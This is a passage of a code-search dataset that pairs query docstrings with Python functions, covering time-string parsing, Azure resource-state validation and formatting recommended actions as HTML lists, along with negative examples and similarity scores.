"def parse_time_str(self, time_str):\n try:\n return datetime.strptime(self.force_hour_two_digits(time_str), TIME_FORMAT).time()\n except ValueError:\n return None",
"def parse_wcinfotime(timestr):\r\n # example: 2003-10-27 20:43:14 +0100 (Mon, 27 Oct 2003)\r\n m = re.match(r'(\\d+-\\d+-\\d+ \\d+:\\d+:\\d+) ([+-]\\d+) .*', timestr)\r\n if not m:\r\n raise ValueError, \"timestring %r does not match\" % timestr\r\n timestr, timezone = m.groups()\r\n # do not handle timezone specially, return value should be UTC\r\n parsedtime = time.strptime(timestr, \"%Y-%m-%d %H:%M:%S\")\r\n return calendar.timegm(parsedtime)",
"def parse_timespan(unparsed):\n pattern = '%H:%M:%S'\n return datetime.strptime(unparsed, pattern) - datetime.strptime('00:00:00', pattern)",
"def parse(string, format):\n # Count the number of spaces in the format string (N), and\n # truncate everything after the (N+1)th space\n spaces = format.count(' ') + 1\n string = ' '.join(string.split()[:spaces])\n\n try:\n result = dt.datetime.strptime(string, format)\n except ValueError, err:\n raise CannotParse(str(err))\n else:\n return result",
"def parse_time(s):\n if s[-1].lower() in secs:\n return int(s[:-1]) * secs[s[-1].lower()]\n else:\n return int(s)",
"def parse(timestring):\n for parser in _PARSERS:\n match = parser['pattern'].match(timestring)\n if match:\n groups = match.groups()\n ints = tuple(map(int, groups))\n time = parser['factory'](ints)\n return time\n\n raise TimeError('Unsupported time format {}'.format(timestring))",
"def parse(s):\n\n rise = False\n set = False\n if s[-1:] == \"R\":\n rise = True\n s = s[:-1]\n elif s[-1:] == \"T\":\n set = True\n s = s[:-1]\n \n x = s.split(\":\")\n if len(x) == 1:\n x.append(\"0\")\n if len(x) == 2:\n x.append(\"0\")\n \n return Time(int(x[0]), int(x[1]), int(x[2]), after_sunrise=rise,\n after_sunset=set)",
"def _parse_time(time_string: str, source: str = \"input\") -> Optional[datetime.datetime]:\n if not time_string:\n return None\n\n format_string = \"%Y-%m-%d\" if source == \"input\" else \"%Y-%m-%dT%H:%M:%SZ\"\n try:\n return datetime.datetime.strptime(time_string, format_string)\n except ValueError:\n raise AnalyzerError(\"Incorrect date format\")",
"def parse_time(time_string):\n times = time_string.split(\"\\n\")\n\n user_time_str = times[-2].split(\"\\t\")[-1]\n sys_time_str = times[-1].split(\"\\t\")[-1]\n\n #print user_time_str, sys_time_str\n\n user_time = parse_m_s(user_time_str)\n sys_time = parse_m_s(sys_time_str)\n\n return user_time + sys_time",
"def parse_time(text):\n try:\n if len(text) == 17:\n date = datetime.datetime.strptime(text, '%Y-%m-%dT%H:%MZ')\n elif len(text) == 20:\n date = datetime.datetime.strptime(text, '%Y-%m-%dT%H:%M:%SZ')\n else:\n date = datetime.datetime.utcnow()\n except Exception as _:\n date = datetime.datetime.utcnow()\n return date",
"def parse_time(time_string, time_format='', **kwargs):\n if isinstance(time_string, pandas.Timestamp):\n return time_string.to_pydatetime()\n elif isinstance(time_string, datetime) or time_format == 'datetime':\n return time_string\n elif isinstance(time_string, tuple):\n return datetime(*time_string)\n elif time_format == 'utime' or isinstance(time_string, (int, float)):\n return datetime(1979, 1, 1) + timedelta(0, time_string)\n elif isinstance(time_string, pandas.DatetimeIndex):\n return time_string._mpl_repr()\n elif isinstance(time_string, np.ndarray) and 'datetime64' in str(time_string.dtype):\n ii = [ss.astype(datetime) for ss in time_string]\n # Validate (in an agnostic way) that we are getting a datetime rather than a date\n return np.array([datetime(*(dt.timetuple()[:6])) for dt in ii])\n elif time_string is 'now':\n return datetime.utcnow()\n elif isinstance(time_string, astropy.time.Time):\n return time_string.datetime\n else:\n # remove trailing zeros and the final dot to allow any\n # number of zeros. This solves issue #289\n if '.' in time_string:\n time_string = time_string.rstrip(\"0\").rstrip(\".\")\n for time_format in TIME_FORMAT_LIST:\n try:\n try:\n ts, time_delta = _regex_parse_time(time_string,\n time_format)\n except TypeError:\n break\n if ts is None:\n continue\n return datetime.strptime(ts, time_format) + time_delta\n except ValueError:\n pass\n\n time_string_parse_format = kwargs.pop('_time_string_parse_format', None)\n if time_string_parse_format is not None:\n # Following a comment by the Lead Developer, the Try / except clause\n # is replaced. The Lead Developer thinks that this the try/except\n # clause is related to SunPy's database module.\n try:\n ts, time_delta = _regex_parse_time(time_string,\n time_string_parse_format)\n if ts and time_delta:\n return datetime.strptime(ts, time_string_parse_format) + time_delta\n else:\n return datetime.strptime(time_string, time_string_parse_format)\n except Exception:\n pass\n raise ValueError(\"'{tstr!s}' is not a valid time string!\".format(tstr=time_string))",
"def parse_time(expr):\n # first deal with hour\n hsp = expr.lower().split('h')\n if len(hsp) > 1: h = int(hsp[0])\n else: h = 0\n # now hour is out of the way\n expr = hsp[-1]\n msp = expr.lower().split('m')\n if len(msp) > 1: m = int(msp[0])\n else: m = 0\n return f\"{h:02d}:{m:02d}:00\"",
"def time_trans(datetime_str):\n\t\tif re.compile(\"(\\d+)-(\\d+)-(\\d+) (\\d+):(\\d+):(\\d+)\").match(datetime_str):\n\t\t\treturn datetime.strptime(datetime_str, \"%Y-%m-%d %H:%M:%S\")",
"def parse_times(time_str):\n warnings = []\n days, interval = time_str.split(',')\n assert int(days) == float(days)\n days = int(days)\n assert int(interval) == float(interval)\n interval = int(interval)\n if interval < 3:\n warnings.append('Minimum interval is 3 hours')\n if days > 14:\n warnings.append('Maximum spot forecast period is 14 days')\n hours = np.arange(days * 24 + 1)[::interval]\n return hours.tolist(), warnings",
"def parse_task_time(line):\n stripret = \"\".join(line.split())\n p = re.compile(r'\\d+\\.\\d{2}-\\d+\\.\\d{2}')\n findret = p.findall(stripret) \n if findret:\n formatstr = \" \".join(line.split())\n timeregx = r'\\d+\\.\\d{2}\\s*-\\s*\\d+\\.\\d{2}'\n time = re.compile(timeregx).findall(formatstr)[0].replace(\" \", \"\").replace(\":\", \".\")\n taskcontext = re.sub(timeregx, \"\", formatstr).strip().replace(\":\", \"\")\n return [taskcontext, time]\n else:\n # log it if line can't be parse\n logging.warning(\"unparsed line: [%r]\" % line)",
"def _get_date(str_time, time_formats = [\"%Y-%m-%d %H:%M:%S.%f\", \"%Y-%m-%d %H:%M:%S\"]):\r\n time = None\r\n for time_format in time_formats:\r\n try:\r\n time = datetime.strptime(str_time, time_format)\r\n if time:\r\n break\r\n except:\r\n pass\r\n return time",
"def parse_timestr(self, timestr):\n\n epoch = datetime.datetime(1970, 1, 1, 0, 0, 0, 0, tzutc())\n return int((parsedate(timestr) - epoch).total_seconds())"
] |
[
"0.6994127",
"0.6513669",
"0.6467536",
"0.6286688",
"0.6278909",
"0.6250281",
"0.62317115",
"0.62049",
"0.61825174",
"0.6160859",
"0.614465",
"0.6121751",
"0.6065498",
"0.603659",
"0.5991278",
"0.59244233",
"0.5907265",
"0.5903873",
"0.5901057",
"0.5886875",
"0.5869222",
"0.58245033",
"0.5805645",
"0.5800728",
"0.5792937",
"0.57811046",
"0.57728523",
"0.5762272",
"0.57442397",
"0.57422864"
] |
0.7575806
|
0
|
Validate the sanity of the Azure resource details obtained from the global state.
|
def __validateResourceStateEntry(self, resource: Dict[str, str]):
if AZ_RESOURCE_ID not in resource:
raise ValueError(
'[%s] %s is not present in the armMapping.' % (
self.fullName, AZ_RESOURCE_ID))
if SID not in resource:
raise ValueError(
'[%s] %s is not present in the armMapping.' % (self.fullName, SID))
if ARM_TYPE not in resource:
raise ValueError(
'[%s] %s is not present in the armMapping.' % (self.fullName, ARM_TYPE))
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _validate_stack(self, _stack):\n\n if len(_stack) == 0 or \"resources\" not in _stack.keys():\n self.status = \"na: no resource in stack\"\n self.logger.warning(\"non-applicable to valet: no resource in stack\")\n return {}\n\n stack = {}\n\n for rk, r in _stack[\"resources\"].items():\n if \"type\" not in r.keys():\n self.status = \"type key is missing in stack\"\n return None\n\n if r[\"type\"] == \"OS::Nova::Server\":\n if \"properties\" not in r.keys():\n self.status = \"properties key is missing in stack\"\n return None\n\n if \"name\" not in r[\"properties\"].keys():\n self.status = \"name property is missing in stack\"\n return None\n\n if r[\"properties\"][\"name\"] is None:\n self.status = \"name property is none\"\n return None\n\n if \"flavor\" not in r[\"properties\"].keys():\n self.status = \"flavor property is missing in stack\"\n return None\n\n if r[\"properties\"][\"flavor\"] is None:\n self.status = \"flavor property is none\"\n return None\n\n stack[rk] = r\n\n if len(stack) == 0:\n self.status = \"na: no server resource in stack\"\n self.logger.warning(\"non-applicable to valet: no server resource in stack\")\n return {}\n\n first_resource = stack[list(stack)[0]]\n apply_valet = False\n\n # To apply Valet decision, availability_zone must exist.\n # And its value contains host variable as a list element.\n if \"availability_zone\" in first_resource[\"properties\"].keys():\n az_value = first_resource[\"properties\"][\"availability_zone\"]\n if isinstance(az_value, list):\n apply_valet = True\n\n for rk, r in stack.items():\n if apply_valet:\n if \"availability_zone\" not in r[\"properties\"].keys():\n self.status = \"az is missing in stack for valet\"\n return None\n else:\n az_value = r[\"properties\"][\"availability_zone\"]\n if not isinstance(az_value, list):\n self.status = \"host variable is missing in stack for valet\"\n return None\n\n if az_value[0] in (\"none\", \"None\") or az_value[1] in (\"none\", \"None\"):\n self.status = \"az value is missing in stack\"\n return None\n else:\n if \"availability_zone\" in r[\"properties\"].keys():\n az_value = r[\"properties\"][\"availability_zone\"]\n if isinstance(az_value, list):\n self.status = \"host variable exists in stack for non-valet application\"\n return None\n\n if not apply_valet:\n self.status = \"na: pass valet\"\n self.logger.warning(\"non-applicable to valet\")\n return {}\n else:\n return stack",
"def _check_azure_metadata_service() -> None:\n try:\n jsn = requests.get(\n AZURE_METADATA_SERVICE_INSTANCE_URL,\n params={\"api-version\": \"2021-02-01\"},\n headers={\"Metadata\": \"true\"},\n timeout=2,\n ).json()\n if \"compute\" not in jsn or \"azEnvironment\" not in jsn[\"compute\"]:\n raise AirflowException(\n f\"Was able to fetch some metadata, but it doesn't look like Azure Metadata: {jsn}\"\n )\n except (requests_exceptions.RequestException, ValueError) as e:\n raise AirflowException(f\"Can't reach Azure Metadata Service: {e}\")",
"async def _a_check_azure_metadata_service(self):\n try:\n async with self._session.get(\n url=AZURE_METADATA_SERVICE_INSTANCE_URL,\n params={\"api-version\": \"2021-02-01\"},\n headers={\"Metadata\": \"true\"},\n timeout=2,\n ) as resp:\n jsn = await resp.json()\n if \"compute\" not in jsn or \"azEnvironment\" not in jsn[\"compute\"]:\n raise AirflowException(\n f\"Was able to fetch some metadata, but it doesn't look like Azure Metadata: {jsn}\"\n )\n except (requests_exceptions.RequestException, ValueError) as e:\n raise AirflowException(f\"Can't reach Azure Metadata Service: {e}\")",
"def _sanity_check(self):\n if self.root.alert_type != ANALYSIS_TYPE_CLOUDPHISH:\n return False\n\n # update the status of this cloudphish request in the database to\n # indicate we've started analyzing it\n\n # lots of sanity checking first\n if not self.root.details or not isinstance(self.root.details, dict):\n logging.error(\"missing or invalid details in {} (details = {})\".format(self.root, self.root.details))\n return False\n\n if KEY_DETAILS_SHA256_URL not in self.root.details:\n logging.error(\"missing key {} in details of {}\".format(KEY_DETAILS_SHA256_URL, self.root))\n return False\n\n if not self.root.details[KEY_DETAILS_SHA256_URL]:\n logging.error(\"missing value for {} in details of {}\".format(KEY_DETAILS_SHA256_URL, self.root))\n return False\n\n return True",
"def _check_validity(self):\n pass",
"def test_is_valid_resource():\n mock_name = \"rg-001\"\n output = sh.is_valid_resource(mock_name)\n assert output is True",
"def validate(self):\n # Validate all mandatory keys are present\n if not self.mandatory_keys.issubset(set(self.resource)):\n raise ResourceInvalidException(\n \"Resource [type: %s, ID: %s] miss a \"\n \"mandatory key. Please check the model.\" % (\n self.__class__.MODEL_TYPE,\n self.id))\n\n # Validate the resource does not contains extra keys\n if not set(self.resource).issubset(self.keys):\n raise ResourceInvalidException(\n \"Resource [type: %s, ID: %s] contains \"\n \"extra keys. Please check the model.\" % (\n self.__class__.MODEL_TYPE,\n self.id))\n\n # Validate the resource value type\n for key, value in self.resource.items():\n if not isinstance(value, self.__class__.MODEL[key][0]):\n raise ResourceInvalidException(\n \"Resource [type: %s, ID: %s] has an invalid \"\n \"key (%s) data type (expected: %s)\" % (\n self.__class__.MODEL_TYPE,\n self.id,\n key,\n self.__class__.MODEL[key][0]))\n # For str type validate the content as according the regex\n if self.__class__.MODEL[key][0] is str:\n if not re.match(self.__class__.MODEL[key][1], value):\n raise ResourceInvalidException(\n \"Resource [type: %s, ID: %s] has an invalid \"\n \"key (%s) data content (expected match : %s)\" % (\n self.__class__.MODEL_TYPE,\n self.id,\n key,\n self.__class__.MODEL[key][1]))\n # For list type validate the content as according the regex\n if self.__class__.MODEL[key][0] is list:\n if not all([re.match(self.__class__.MODEL[key][1], v)\n for v in value]):\n raise ResourceInvalidException(\n \"Resource [type: %s, ID: %s] has an invalid \"\n \"key (%s) data content (expected match : %s)\" % (\n self.__class__.MODEL_TYPE,\n self.id,\n key,\n self.__class__.MODEL[key][1]))",
"def sanity_check(self):\n pass",
"def _check(self):\n assert self._leaves, (\n 'Need to validate AssetAllocation before using it.')",
"def validate_availability_zones(self, context, resource_type,\n availability_zones):",
"def _resource_name_check(self, resource_name):\n return self._name_check(resource_name, 'resources')",
"def creation_validation(**_):\n\n for property_key in constants.VOLUME_REQUIRED_PROPERTIES:\n utils.validate_node_property(property_key, ctx.node.properties)\n\n volume_object = _get_volumes_from_id(utils.get_resource_id())\n\n if ctx.node.properties['use_external_resource'] and not volume_object:\n raise NonRecoverableError(\n 'External resource, but the supplied '\n 'EBS volume does not exist in the account.')\n\n if not ctx.node.properties['use_external_resource'] and volume_object:\n raise NonRecoverableError(\n 'Not external resource, but the supplied '\n 'EBS volume exists in the account.')",
"def validate(self) -> bool:\n # Call RH for the collector VM. If the call is successful, the collector VM has been assigned the right roles.\n collectorVM = AzureInstanceMetadataService.getComputeInstance(\n self.tracer, self.name)\n collectorVMArmId = ARM_ID_TEMPLATE % (\n collectorVM[SUBSCRIPTION_ID], collectorVM[RESOURCE_GROUP_NAME], collectorVM[NAME])\n rhClient = ResourceHealth(self.tracer)\n try:\n rhEvents = rhClient.getHistoricalResourceAvailabilityEvents(\n self.ctx.authToken, collectorVMArmId)\n except Exception as e:\n self.tracer.error(\n \"[%s] RH call validation failed(%s).\", self.fullName, e, exc_info=True)\n return False\n\n return True",
"def test_check_resource(self):\n s1 = System()\n b1 = Books(\"1984\", \"George Orwell\", \"Harvill Secker\", \"1949\", \"0123456789123\")\n self.assertEqual(s1.check_resource(b1), False)\n s1.add_resource(b1)\n self.assertEqual(s1.check_resource(b1), True)",
"def validate_metadata(self):\n metadata = self.get_client_metadata()\n\n return True",
"def resources():\n check_resources()",
"def sanity_check(self):\n return True",
"def _validate(self):\n pass",
"def resource_details(self) -> pulumi.Input[Union['AzureResourceDetailsArgs', 'OnPremiseResourceDetailsArgs', 'OnPremiseSqlResourceDetailsArgs']]:\n return pulumi.get(self, \"resource_details\")",
"def _validate_config(self):\n pass",
"def _validate_subcloud_config(self,\n context,\n name,\n management_subnet_str,\n management_start_ip_str,\n management_end_ip_str,\n management_gateway_ip_str,\n systemcontroller_gateway_ip_str):\n\n # Validate the name\n if name.isdigit():\n pecan.abort(400, _(\"name must contain alphabetic characters\"))\n\n if name in [consts.DEFAULT_REGION_NAME,\n consts.SYSTEM_CONTROLLER_NAME]:\n pecan.abort(400, _(\"name cannot be %(bad_name1)s or %(bad_name2)s\")\n % {'bad_name1': consts.DEFAULT_REGION_NAME,\n 'bad_name2': consts.SYSTEM_CONTROLLER_NAME})\n\n # Parse/validate the management subnet\n subcloud_subnets = []\n subclouds = db_api.subcloud_get_all(context)\n for subcloud in subclouds:\n subcloud_subnets.append(IPNetwork(subcloud.management_subnet))\n\n MIN_MANAGEMENT_SUBNET_SIZE = 8\n # subtract 3 for network, gateway and broadcast addresses.\n MIN_MANAGEMENT_ADDRESSES = MIN_MANAGEMENT_SUBNET_SIZE - 3\n\n management_subnet = None\n try:\n management_subnet = validate_network_str(\n management_subnet_str,\n minimum_size=MIN_MANAGEMENT_SUBNET_SIZE,\n existing_networks=subcloud_subnets)\n except ValidateFail as e:\n LOG.exception(e)\n pecan.abort(400, _(\"management-subnet invalid: %s\") % e)\n\n # Parse/validate the start/end addresses\n management_start_ip = None\n try:\n management_start_ip = validate_address_str(\n management_start_ip_str, management_subnet)\n except ValidateFail as e:\n LOG.exception(e)\n pecan.abort(400, _(\"management-start-ip invalid: %s\") % e)\n\n management_end_ip = None\n try:\n management_end_ip = validate_address_str(\n management_end_ip_str, management_subnet)\n except ValidateFail as e:\n LOG.exception(e)\n pecan.abort(400, _(\"management-end-ip invalid: %s\") % e)\n\n if not management_start_ip < management_end_ip:\n pecan.abort(\n 400,\n _(\"management-start-ip not less than management-end-ip\"))\n\n if not len(IPRange(management_start_ip, management_end_ip)) >= \\\n MIN_MANAGEMENT_ADDRESSES:\n pecan.abort(\n 400,\n _(\"management address range must contain at least %d \"\n \"addresses\") % MIN_MANAGEMENT_ADDRESSES)\n\n # Parse/validate the gateway\n try:\n validate_address_str(\n management_gateway_ip_str, management_subnet)\n except ValidateFail as e:\n LOG.exception(e)\n pecan.abort(400, _(\"management-gateway-ip invalid: %s\") % e)\n\n # Ensure subcloud management gateway is not within the actual subcloud\n # management subnet address pool for consistency with the\n # systemcontroller gateway restriction below. 
Address collision\n # is not a concern as the address is added to sysinv.\n subcloud_mgmt_address_start = IPAddress(management_start_ip_str)\n subcloud_mgmt_address_end = IPAddress(management_end_ip_str)\n subcloud_mgmt_gw_ip = IPAddress(management_gateway_ip_str)\n if ((subcloud_mgmt_gw_ip >= subcloud_mgmt_address_start) and\n (subcloud_mgmt_gw_ip <= subcloud_mgmt_address_end)):\n pecan.abort(400, _(\"management-gateway-ip invalid, \"\n \"is within management pool: %(start)s - \"\n \"%(end)s\") %\n {'start': subcloud_mgmt_address_start,\n 'end': subcloud_mgmt_address_end})\n\n # Ensure systemcontroller gateway is in the management subnet\n # for the systemcontroller region.\n management_address_pool = self._get_management_address_pool(context)\n systemcontroller_subnet_str = \"%s/%d\" % (\n management_address_pool.network,\n management_address_pool.prefix)\n systemcontroller_subnet = IPNetwork(systemcontroller_subnet_str)\n try:\n validate_address_str(\n systemcontroller_gateway_ip_str, systemcontroller_subnet)\n except ValidateFail as e:\n LOG.exception(e)\n pecan.abort(400, _(\"systemcontroller-gateway-ip invalid: %s\") % e)\n # Ensure systemcontroller gateway is not within the actual\n # management subnet address pool to prevent address collision.\n mgmt_address_start = IPAddress(management_address_pool.ranges[0][0])\n mgmt_address_end = IPAddress(management_address_pool.ranges[0][1])\n systemcontroller_gw_ip = IPAddress(systemcontroller_gateway_ip_str)\n if ((systemcontroller_gw_ip >= mgmt_address_start) and\n (systemcontroller_gw_ip <= mgmt_address_end)):\n pecan.abort(400, _(\"systemcontroller-gateway-ip invalid, \"\n \"is within management pool: %(start)s - \"\n \"%(end)s\") %\n {'start': mgmt_address_start, 'end': mgmt_address_end})",
"def test_nonstandard_resource(self):\n manifest = copy.deepcopy(job_test_utils.COMPLETE_MANIFEST)\n manifest['job']['resources']['scalar'].append({'name': 'chocolate', 'value': 1.0 })\n config = copy.deepcopy(self.configuration)\n json_data = {\n 'manifest': manifest,\n 'configuration': config\n }\n\n url = '/%s/job-types/validation/' % self.api\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n results = json.loads(response.content)\n self.assertTrue(results['is_valid'])\n self.assertEqual(len(results['warnings']), 1)\n self.assertEqual(results['warnings'][0]['name'], 'NONSTANDARD_RESOURCE')",
"def test_determine_valid_virtualization_realms(self):\n pass",
"def test_resource_err(self, integrationtest, k8sconfig):\n # Fixtures.\n config = self.k8sconfig(integrationtest, k8sconfig)\n err_resp = (K8sResource(\"\", \"\", \"\", False, \"\"), True)\n MM = MetaManifest\n\n # Sanity check: ask for a valid StatefulSet.\n _, err = k8s.resource(config, MM(\"apps/v1\", \"StatefulSet\", \"ns\", \"name\"))\n assert not err\n\n # Ask for a StatefulSet on a bogus API endpoint.\n assert k8s.resource(config, MM(\"bogus\", \"StatefulSet\", \"ns\", \"name\")) == err_resp\n\n # Ask for a bogus K8s kind.\n assert k8s.resource(config, MM(\"v1\", \"Bogus\", \"ns\", \"name\")) == err_resp\n assert k8s.resource(config, MM(\"\", \"Bogus\", \"ns\", \"name\")) == err_resp",
"def validate_config(self):\n pass",
"def validate_config(self):\n pass",
"def validate(self):\n try:\n # update _resource to have default values from the schema\n self._resource = self.schema(self._resource)\n except MultipleInvalid as e:\n errors = [format_error(err, self.resource_type) for err in e.errors]\n raise exceptions.ValidationError({'errors': errors})\n\n yield self.check_unique()",
"def __validate(self):\n pass",
"def check_validity(self):",
"def _validate_resources(self):\n resources = self.options.resources\n\n for key in ['num_machines', 'num_mpiprocs_per_machine', 'tot_num_mpiprocs']:\n if key in resources and resources[key] != 1:\n raise exceptions.FeatureNotAvailable(\n f'Cannot set resource `{key}` to value `{resources[key]}` for `{self.__class__.__name__}`: '\n 'parallelization is not supported, only a value of `1` is accepted.'\n )"
] |
[
"0.5771019",
"0.5764822",
"0.5651339",
"0.5575817",
"0.5543914",
"0.55022097",
"0.5467342",
"0.5466281",
"0.54335773",
"0.5416878",
"0.5407321",
"0.53656614",
"0.53434116",
"0.53363395",
"0.5335866",
"0.5316301",
"0.53111744",
"0.5309585",
"0.5295233",
"0.52703154",
"0.5262302",
"0.5248834",
"0.5244604",
"0.52398956",
"0.5239536",
"0.5239536",
"0.52328485",
"0.52265793",
"0.5214296",
"0.52081424"
] |
0.660925
|
0
|
Convert the JSON array structure of recommendedActions into an HTML list.
|
def __formatToHtml(self, recommendedActions: List[Dict[str, str]]) -> str:
recommendedSteps = []
for action in recommendedActions:
actionText = action[ACTION]
# Strip the <action> and </action> tags; the action URLs are not absolute, so they cannot be rendered as links.
actionText = actionText.replace(ACTION_HTML_OPEN_TAG, '')
actionText = actionText.replace(ACTION_HTML_CLOSE_TAG, '')
recommendedSteps.append(actionText)
# Convert the list to HTML <li> format.
actionsAsHtmlListElements = self.__convertToHtmlListElement(
recommendedSteps)
# Format the html template with the <li> elements.
htmlContent = RECOMMENDED_ACTIONS_HTML_TEMPLATE % actionsAsHtmlListElements
return htmlContent
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def list_actions() -> None:\n colorama_init()\n max_action_name_len = max(len(name) for name in KNOWN_ACTIONS.keys())\n wrapper = textwrap.TextWrapper(\n width=80 - max_action_name_len - 3,\n subsequent_indent=' ' * (max_action_name_len + 3),\n )\n print(\n '{bright}{name:<{max_action_name_len}} -{normal} {doc}'.format(\n bright=Style.BRIGHT,\n name='name',\n max_action_name_len=max_action_name_len,\n normal=Style.NORMAL,\n doc='description [(argument: type, ...)]',\n )\n )\n print('-' * 80)\n for name, action in KNOWN_ACTIONS.items():\n wrapped_doc = wrapper.fill(' '.join(str(action.__doc__).split()))\n print(\n '{bright}{name:<{max_action_name_len}} -{normal} {doc}'.format(\n bright=Style.BRIGHT,\n name=name,\n max_action_name_len=max_action_name_len,\n normal=Style.NORMAL,\n doc=wrapped_doc,\n )\n )\n return None",
"def review_list_handler():\n return jsonify(languages=supported_languages)",
"def _generate_actions(self) -> list:\n pass",
"async def listreact(self, ctx):\n emojis = await self.conf.guild(ctx.guild).reactions()\n msg = f\"Smart Reactions for {ctx.guild.name}:\\n\"\n for emoji in emojis:\n for command in emojis[emoji]:\n msg += f\"{emoji}: {command}\\n\"\n for page in pagify(msg, delims=[\"\\n\"]):\n await ctx.send(page)",
"def _parse_actions_list(self, actions_cfg, dataset_name):\n # iterate over actions and parse\n for i, cfg in enumerate(actions_cfg):\n actions_cfg[i] = self._parse_action(cfg, dataset_name)\n\n return actions_cfg",
"def _process_html(self) -> None:\n opinion_json = self.request[\"response\"].json()\n for case in opinion_json:\n url = self._get_url(case[\"docketNumber\"], case[\"docketEntryId\"])\n status = (\n \"Published\"\n if case[\"documentType\"] == \"T.C. Opinion\"\n else \"Unpublished\"\n )\n self.cases.append(\n {\n \"judge\": case[\"judge\"],\n \"date\": case[\"filingDate\"][:10],\n \"docket\": case[\"docketNumber\"],\n \"url\": url,\n \"name\": titlecase(case[\"caseCaption\"]),\n \"status\": status,\n }\n )",
"def list(self):\n\n return list(\n filter(\n lambda x: x.get('type') != 'tagit', # pragma: no cover\n self._post(\n request=ApiActions.LIST.value,\n uri=ApiUri.ACTIONS.value,\n ).get('actions')\n )\n )",
"def list_of_stories():\n return render_template(\"list_of_stories.html\", stories = stories.values())",
"def _convert_longform_feedback_to_html(self, response_items):\r\n\r\n # We want to display available feedback in a particular order.\r\n # This dictionary specifies which goes first--lower first.\r\n priorities = {\r\n # These go at the start of the feedback\r\n 'spelling': 0,\r\n 'grammar': 1,\r\n # needs to be after all the other feedback\r\n 'markup_text': 3\r\n }\r\n do_not_render = ['topicality', 'prompt-overlap']\r\n\r\n default_priority = 2\r\n\r\n def get_priority(elt):\r\n \"\"\"\r\n Args:\r\n elt: a tuple of feedback-type, feedback\r\n Returns:\r\n the priority for this feedback type\r\n \"\"\"\r\n return priorities.get(elt[0], default_priority)\r\n\r\n def encode_values(feedback_type, value):\r\n feedback_type = str(feedback_type).encode('ascii', 'ignore')\r\n if not isinstance(value, basestring):\r\n value = str(value)\r\n value = value.encode('ascii', 'ignore')\r\n return feedback_type, value\r\n\r\n def format_feedback(feedback_type, value):\r\n feedback_type, value = encode_values(feedback_type, value)\r\n feedback = u\"\"\"\r\n <div class=\"{feedback_type}\">\r\n {value}\r\n </div>\r\n \"\"\".format(feedback_type=feedback_type, value=value)\r\n return feedback\r\n\r\n def format_feedback_hidden(feedback_type, value):\r\n feedback_type, value = encode_values(feedback_type, value)\r\n feedback = \"\"\"\r\n <input class=\"{feedback_type}\" type=\"hidden\" value=\"{value}\" />\r\n \"\"\".format(feedback_type=feedback_type, value=value)\r\n return feedback\r\n\r\n # TODO (vshnayder): design and document the details of this format so\r\n # that we can do proper escaping here (e.g. are the graders allowed to\r\n # include HTML?)\r\n\r\n _ = self.system.service(self, \"i18n\").ugettext\r\n for tag in ['success', 'feedback', 'submission_id', 'grader_id']:\r\n if tag not in response_items:\r\n # This is a student_facing_error\r\n return format_feedback(\r\n # Translators: the `grader` refers to the grading service open response problems\r\n # are sent to, either to be machine-graded, peer-graded, or instructor-graded.\r\n 'errors', _('Error getting feedback from grader.')\r\n )\r\n\r\n feedback_items = response_items['feedback']\r\n try:\r\n feedback = json.loads(feedback_items)\r\n except (TypeError, ValueError):\r\n # This is a dev_facing_error\r\n log.exception(\"feedback_items from external open ended grader have invalid json {0}\".format(feedback_items))\r\n # This is a student_facing_error\r\n return format_feedback(\r\n # Translators: the `grader` refers to the grading service open response problems\r\n # are sent to, either to be machine-graded, peer-graded, or instructor-graded.\r\n 'errors', _('Error getting feedback from grader.')\r\n )\r\n\r\n if response_items['success']:\r\n if len(feedback) == 0:\r\n # This is a student_facing_error\r\n return format_feedback(\r\n # Translators: the `grader` refers to the grading service open response problems\r\n # are sent to, either to be machine-graded, peer-graded, or instructor-graded.\r\n 'errors', _('No feedback available from grader.')\r\n )\r\n\r\n for tag in do_not_render:\r\n if tag in feedback:\r\n feedback.pop(tag)\r\n\r\n feedback_lst = sorted(feedback.items(), key=get_priority)\r\n feedback_list_part1 = u\"\\n\".join(format_feedback(k, v) for k, v in feedback_lst)\r\n else:\r\n # This is a student_facing_error\r\n feedback_list_part1 = format_feedback('errors', response_items['feedback'])\r\n\r\n feedback_list_part2 = (u\"\\n\".join([format_feedback_hidden(feedback_type, value)\r\n for feedback_type, value in 
response_items.items()\r\n if feedback_type in ['submission_id', 'grader_id']]))\r\n\r\n return u\"\\n\".join([feedback_list_part1, feedback_list_part2])",
"def _generate_swipe_actions(ui_object_list):\n action_list = []\n action_rule = common.ActionRules.SWIPE_TO_OBJECT_RULE\n\n for object_index, ui_object in enumerate(ui_object_list):\n if _valid_object_with_name(ui_object):\n (verb_str,\n action_type) = _get_verb_str_action_type('swipe', ui_object.obj_type)\n obj_desc_str = _get_obj_desc_str(action_rule, ui_object)\n action = common.Action(\n verb_str=verb_str,\n obj_desc_str=obj_desc_str,\n input_content_str=config.LABEL_DEFAULT_VALUE_STRING,\n action_type=action_type,\n action_rule=action_rule,\n target_obj_idx=object_index)\n action_list.append(action)\n\n for action_element in action_list:\n _fill_action_info(action_element)\n return action_list",
"def _get_html(course_updates_items):\r\n list_items = []\r\n for update in reversed(course_updates_items):\r\n # filter course update items which have status \"deleted\".\r\n if update.get(\"status\") != CourseInfoModule.STATUS_DELETED:\r\n list_items.append(u\"<article><h2>{date}</h2>{content}</article>\".format(**update))\r\n return u\"<section>{list_items}</section>\".format(list_items=\"\".join(list_items))",
"def actions(self):\n from moztrap.view.lists.actions import actions\n return actions",
"def get_list_of_actions(self):\n return self.actions",
"def _help_actions(self):\n actions_str = \"\"\n for (key, value) in self.actions_help.items():\n actions_str += \"command: %s\\n%s\\n\\n\" % (key, value)\n print(actions_str)\n sys.exit(0)",
